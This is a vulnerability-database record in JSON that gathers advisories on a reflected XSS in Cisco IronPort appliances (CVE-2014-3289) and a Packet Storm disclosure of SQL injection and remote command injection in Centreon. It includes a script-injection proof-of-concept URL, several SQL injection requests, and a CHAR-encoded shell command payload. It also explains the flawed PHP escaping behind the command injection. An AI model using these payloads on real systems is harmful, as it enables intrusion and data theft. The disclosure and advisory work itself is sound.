{"id": "PACKETSTORM:127004", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Cisco Ironport Email Security Virtual Appliance 8.0.0-671 XSS", "description": "", "published": "2014-06-09T00:00:00", "modified": "2014-06-09T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/", "score": 4.3}, "href": "https://packetstormsecurity.com/files/127004/Cisco-Ironport-Email-Security-Virtual-Appliance-8.0.0-671-XSS.html", "reporter": "William Costa", "references": [], "cvelist": ["CVE-2014-3289"], "lastseen": "2016-12-05T22:23:00", "viewCount": 11, "enchantments": {"score": {"value": 5.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "cert", "idList": ["VU:613308"]}, {"type": "cisco", "idList": ["CISCO-SA-20140609-CVE-2014-3289"]}, {"type": "cve", "idList": ["CVE-2014-3289"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128740"]}, {"type": "threatpost", "idList": ["THREATPOST:882B0B7351822FF76556F5DEFFF3C512"]}], "rev": 4}, "backreferences": {"references": [{"type": "cisco", "idList": ["CISCO-SA-20140609-CVE-2014-3289"]}, {"type": "cve", "idList": ["CVE-2014-3289"]}]}, "exploitation": null, "vulnersScore": 5.2}, "sourceHref": "https://packetstormsecurity.com/files/download/127004/ciscoironport-xss.txt", "sourceData": "`I. VULNERABILITY \n------------------------- \n \nReflected XSS Attacks vulnerabilities in Cisco Ironport Email Security \nVirtual Appliance Version: 8.0.0-671 \n \nII. BACKGROUND \n------------------------- \nCisco Systems, Inc. is an American multinational corporation headquartered \nin San Jose, California, that designs, manufactures, and sells networking \nequipment. \n \nIII. DESCRIPTION \n------------------------- \nA Reflected XSS vulnerability has been detected in Cisco Ironport Email \nSecurity Virtual appliance. \nThe code injection is done through the parameter \"date_range\" in the page \u201c \n/monitor/reports/overview?printable=False&date_range\u201d \n \nIV. 
PROOF OF CONCEPT \n------------------------- \nThe application does not validate the parameter \u201cdate_range\u201d correctly. \n \nhttps://ip_cisco_web_security/monitor/reports/overview?printabl \ne=False&date_range=aaaa<script>alert(2)</script> \n \nV. BUSINESS IMPACT \n------------------------- \nAn attacker can execute arbitrary HTML or script code in a targeted \nuser's browser, which allows the execution of arbitrary HTML/script code \nto be executed in the context of the victim user's browser. \n \nVI. SYSTEMS AFFECTED \n------------------------- \nReflected XSS Attacks vulnerabilities in Cisco Ironport Email Security \nVirtual Appliance Version: 8.0.0-671. \n \nVII. SOLUTION \n------------------------- \nhttp://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-3289 \n \nBy William Costa \n \nwilliam.costa@gmail.com \n \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{"cert": [{"lastseen": "2021-09-28T17:50:01", "description": "### Overview\n\nCisco AsyncOS contains a reflected cross-site scripting (XSS) vulnerability.\n\n### Description\n\n[**CWE-79**](<http://cwe.mitre.org/data/definitions/79.html>)**: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CVE-2014-3289**\n\nCisco AsyncOS, the underlying OS for the Cisco Email Security Appliance, Web Security Appliance, and Content Security Management Appliance, contains a reflected cross-site scripting vulnerability in the reports overview page of the management interface. An attacker is able to load arbitrary script in the context of the user's browser through the `date_range` parameter. \n \n**Affected Products:**\n\n * Cisco Email Security Appliance 8.0 and earlier\n * Cisco Web Security Appliance 8.0 and earlier\n * Content Security Management Appliance 8.3 and earlier \n--- \n \n### Impact\n\nA remote unauthenticated attacker may be able to execute arbitrary script in the context of the end-user's browser session. \n \n--- \n \n### Solution\n\n**Apply an Update**Cisco has released a [patch ](<http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-3289>)to address this vulnerability. If you are unable to upgrade, please consider the following workaround. \n \n--- \n \n**Restrict Access** \nAs a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent XSS or CSRF attacks since the attack comes as an HTTP request from a legitimate user's host. Restricting access would prevent an attacker from accessing the web interface using stolen credentials from a blocked network location. \n \n--- \n \n### Vendor Information\n\n613308\n\n
### Cisco Systems, Inc. Affected\n\nNotified: February 17, 2014 Updated: June 10, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-3289>\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 4.3 | AV:N/AC:M/Au:N/C:N/I:P/A:N \nTemporal | 3.6 | E:F/RL:OF/RC:C \nEnvironmental | 2.7 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <http://www.cisco.com/c/en/us/products/security/email-security-appliance/asyncos_index.html>\n * <http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-3289>\n * <http://cwe.mitre.org/data/definitions/79.html>\n\n### Acknowledgements\n\nThanks to William Costa for reporting this vulnerability.\n\nThis document was written by Chris King.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-3289](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-3289>) \n---|--- \n**Date Public:** | 2014-06-09 \n**Date First Published:** | 2014-06-10 \n**Date Last Updated: ** | 2014-06-10 13:50 UTC \n**Document Revision: ** | 15 \n", "cvss3": {}, "published": "2014-06-10T00:00:00", "type": "cert", "title": "Cisco AsyncOS contains a reflected cross-site scripting (XSS) vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3289"], 
"modified": "2014-06-10T13:50:00", "id": "VU:613308", "href": "https://www.kb.cert.org/vuls/id/613308", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:41", "bulletinFamily": "info", "cvelist": ["CVE-2014-3289"], "description": "There\u2019s a reflected cross-site scripting vulnerability in a variety of Cisco security appliances that enables a remote, unauthenticated attacker to execute arbitrary code in the context of the user.\n\nThe vulnerability affects the Cisco Email Security Appliance, the Cisco Web Security Appliance and the Content Security Management Appliance. Cisco has released updated software to fix the flaw for each of the affected appliances. The problem lies in the AsyncOS, the operating system that runs on the Cisco security appliances.\n\n\u201cCisco AsyncOS, the underlying OS for the Cisco Email Security Appliance, Web Security Appliance, and Content Security Management Appliance, contains a reflected cross-site scripting vulnerability in the reports overview page of the management interface. An attacker is able to load arbitrary script in the context of the user\u2019s browser through the date_range parameter,\u201d an [advisory](<http://www.kb.cert.org/vuls/id/613308>) from the CERT/CC at Carnegie Mellon University says.\n\nThe vulnerability affects the following products from Cisco:\n\n * Cisco Email Security Appliance 8.0 and earlier\n * Cisco Web Security Appliance 8.0 and earlier\n * Content Security Management Appliance 8.3 and earlier\n\nCisco officials said that the vulnerability could be exploited through a simple malicious URL.\n\n\u201cThe vulnerability is due to insufficient input validation of a parameter. 
An attacker could exploit this vulnerability by convincing the user to access a malicious link,\u201d the Cisco [advisory](<http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-3289>) says.\n\nThe CERT/CC advises customers who can\u2019t upgrade immediately to consider restricting access to only trusted hosts.\n\n\u201cAs a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent XSS or CSRF attacks since the attack comes as an HTTP request from a legitimate user\u2019s host. Restricting access would prevent an attacker from accessing the web interface using stolen credentials from a blocked network location,\u201d the advisory says.\n", "modified": "2014-06-11T21:01:44", "published": "2014-06-10T10:47:30", "id": "THREATPOST:882B0B7351822FF76556F5DEFFF3C512", "href": "https://threatpost.com/cisco-patches-xss-flaw-in-security-appliances/106558/", "type": "threatpost", "title": "Cisco Patches XSS Flaw in Security Appliances", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "cisco": [{"lastseen": "2022-06-05T10:05:17", "description": "A vulnerability in the web management interface of Cisco AsyncOS could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web interface on the affected system.\n\nThe vulnerability is due to insufficient input validation of a parameter. 
An attacker could exploit this vulnerability by convincing the user to access a malicious link.\n\nCisco has confirmed the vulnerability in a security notice; however, software updates are not available.\n\nTo exploit the vulnerability, the attacker may provide a link that directs a user to a malicious site and use misleading language or instructions to persuade the user to follow the provided link.\n\nCisco indicates through the CVSS score that functional exploit code exists; however, the code is not known to be publicly available.", "cvss3": {}, "published": "2014-06-09T20:38:39", "type": "cisco", "title": "Cisco AsyncOS Cross-Site Scripting Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3289"], "modified": "2014-06-09T20:38:39", "id": "CISCO-SA-20140609-CVE-2014-3289", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20140609-CVE-2014-3289", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T12:50:32", "description": "Cross-site scripting (XSS) vulnerability in the web management interface in Cisco AsyncOS on the Email Security Appliance (ESA) 8.0, Web Security Appliance (WSA) 8.0 (.5 Hot Patch 1) and earlier, and Content Security Management Appliance (SMA) 8.3 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted parameter, as demonstrated by the date_range parameter to monitor/reports/overview on the IronPort ESA, aka Bug IDs CSCun07998, CSCun07844, and 
CSCun07888.", "cvss3": {}, "published": "2014-06-10T11:19:00", "type": "cve", "title": "CVE-2014-3289", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3289"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/o:cisco:ironport_asyncos:8.3", "cpe:/h:cisco:web_security_appliance:-", "cpe:/h:cisco:content_security_management_appliance:-", "cpe:/o:cisco:ironport_asyncos:8.0", "cpe:/o:cisco:email_security_appliance_firmware:-"], "id": "CVE-2014-3289", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3289", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:h:cisco:content_security_management_appliance:-:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ironport_asyncos:8.3:*:*:*:*:*:*:*", "cpe:2.3:h:cisco:web_security_appliance:-:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ironport_asyncos:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:email_security_appliance_firmware:-:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:24:12", "description": "", "cvss3": {}, "published": "2014-10-18T00:00:00", "type": "packetstorm", "title": "Centreon SQL Injection / Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-3828", "CVE-2014-3829", "CVE-2014-3289"], "modified": "2014-10-18T00:00:00", "id": "PACKETSTORM:128740", "href": "https://packetstormsecurity.com/files/128740/Centreon-SQL-Injection-Command-Injection.html", "sourceData": "`# Multiple unauthenticated SQL injections and unauthenticated remote \ncommand injection in Centreon <= 2.5.2 and 
Centreon Enterprise Server <= \n2.2|3.0 \n# \n# Product link: http://www.centreon.com/ \n# CVE references \n# |- CVE-2014-3828: Unauthenticated SQL injections \n# |- CVE-2014-3829: Unauthenticated remote command injection \n# CERT/CC reference: VU#298796 \n# Author: MaZ \n \nTL;DR \n----- \nCentreon is vulnerable to several pre-auth SQLi and a cool pre-auth rci: \nthe only prerequisite to exploit the rci is to have at least one user \n(you, your fav sysadmin or someone else) connected to the WebUI. \nAll Centreon versions from 2008 (v2.0) are vulnerable to the rci. Vulns \nwere originally found for the 2.5.1 version but the 2.5.2 seems to be \nstill vulnerable. \nSee the quick'n'dirty PoC below. An msf module might soon be \navailable. \n \n \nPoC \n--- \n> SQL injections: \n------------------ \n[POST] \nhttp://server/centreon/include/configuration/configObject/traps/GetXMLTrapsForVendor.php \n[POST DATA] mnftr_id=1 or 1=1 union all select version(),2 -- /** \n \n[POST] \nhttp://server/centreon/include/common/javascript/commandGetArgs/cmdGetExample.php \n[POST DATA] index=2' or 1=1 -- /** \n \n[GET] http://server/centreon/include/views/graphs/GetXmlTree.php?sid=' \nor 1=1 -- /** \n \n[GET] \nhttp://server/centreon/include/views/graphs/graphStatus/displayServiceStatus.php?session_id=0' \nor 1=1 -- /**&index=1' or 1=1 -- /** \n \n[GET] \nhttp://server/centreon/include/views/graphs/common/makeXML_ListMetrics.php?index_id=' \nunion select @@version,2,3 -- /** \n \n> Remote Command Injection \n--------------------------- \nFor older versions, the URL is not: \nhttp://server/centreon/include/views/graphs/graphStatus/displayServiceStatus.php \nbut: \nhttp://server/centreon/include/views/graphs/statusGraphs/displayServiceStatus.php. 
\n \n[PAYLOAD] \";uname -a;\" which has to be converted to SQL \"CHAR(59, 32, \n117, 110, 97, 109, 101, 32, 45, 97, 59)\" \n \n[GET] \nhttp://server/centreon/include/views/graphs/graphStatus/displayServiceStatus.php \n?session_id=' or 1=1 -- /** \n&template_id=' UNION ALL SELECT 1,2,3,4,5,CHAR(59, 32, 117, 110, 97, \n109, 101, 32, 45, 97, \n59),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- /** \n \n \nDetails \n------- \n> SQLi injections: \n------------------ \nSee for yourself \n$ cd www/ \n$ grep -inr \"DB->query(\" . |grep -P \"$_(GET|POST)\" \n \n> Remote Command Injection \n--------------------------- \nThe following world-accessible file \n\"www/include/views/graphs/graphStatus/displayServiceStatus.php\" contains \na few coding mistakes. \nThe purpose of this script is to produce a graph, relying on the \nexecution of a shell command involving the \"graph\" executable: a \nmis-escaped shell command is built throughout the script. \n \nWell first, there's an SQLi in the request which checks for an active \nsession (someone has to be currently logged in). From line 70 : \n/* \n* Verify if session is active \n*/ \n \n$session = $pearDB->query(\"SELECT * FROM `session` WHERE session_id = \n'\".$_GET[\"session_id\"].\"'\"); \n \n \nThen, some graph parameters are taken from a template id. The associated \nrequest is also vulnerable to SQLi. \nFrom line 120 you have the code responsible for setting the variable \n$template_id : \nif (!isset($_GET[\"template_id\"])|| !$_GET[\"template_id\"]){ \n$host_id = getMyHostID($index_data_ODS[\"host_name\"]); \n$svc_id = getMyServiceID($index_data_ODS[\"service_description\"], \n$host_id); \n$template_id = getDefaultGraph($svc_id, 1); \n$index = $index_data_ODS[\"id\"]; \n} else \n$template_id = $_GET[\"template_id\"]; \n \n \nThen, there's an SQLi in the request which gets the graph parameters. 
\nFrom line 140: \n/* \n* get all template infos \n*/ \n \n$DBRESULT = $pearDB->query(\"SELECT * FROM giv_graphs_template WHERE \ngraph_id = '\".$template_id.\"' LIMIT 1\"); \n$GraphTemplate = $DBRESULT->fetchRow(); \n \n \nThen, these graph parameters are put into the command. Notably the \n\"base\" parameter, corresponding to the 6th column in the \n'giv_graphs_template' table. \nFrom line 163: \n$base = \"\"; \nif (isset($GraphTemplate[\"base\"]) && $GraphTemplate[\"base\"]) \n{ \n$base = \"-b \".$GraphTemplate[\"base\"]; \n} \n \nAt line 184: \n$command_line .= \" --interlaced $base --imgformat PNG \n--width=\".$GraphTemplate[\"width\"].\" \n--height=\".$GraphTemplate[\"height\"].\" \"; \n \n \nThen, the command line is escaped...but some special chars, notably ';', \nare missed: \nFrom line 254: \n/* \n* Escale special char \n*/ \n$command_line = escape_command(\"$command_line\"); \n \nFrom line 38: \nfunction escape_command($command) { \nreturn preg_replace(\"/(\\\\\\$|`)/\", \"\", $command); \n} \n \n \nFinally and to top it all, the command gets executed and the stdout is \nechoed. \nFrom line 259: \n$fp = popen($command_line , 'r'); \nif (isset($fp) && $fp ) { \n$str =''; \nwhile (!feof ($fp)) { \n$buffer = fgets($fp, 4096); \n$str = $str . $buffer ; \n} \nprint $str; \n} \n \n \nSolution \n-------- \nBrace yourself and \n* Delete displayServiceStatus.php: I don't know if it'll break something \nor not \n* Wait for patches \n \n \nTimeline \n-------- \nJun 3, 2014: Discoverer found vulns, asked for CVE and contacted vendor \nthrough their contact@ and sales@ mail. Not a single f*** seems to be \ngiven from them \nJun 21, 2014: Discoverer contacted Rapid7. Yes, they're cool \nAug 04, 2014: Rapid7 validated CVE-2014-3289 \nAug 11, 2014: Rapid7 validated CVE-2014-3828 \nAug 28, 2014: Researcher and Rapid7 agree to disclose to CERT/CC. \nSep 2, 2014: Disclosure to CERT/CC. They'll try to reach the vendor. 
\nPublic disclosure date is set on October 15, 2014 \nOct 16, 2014: No fix or news from Centreon. Not a single f*** is \ndefinitely given. Public disclosure. Period \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128740/centreon-sqlexec.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}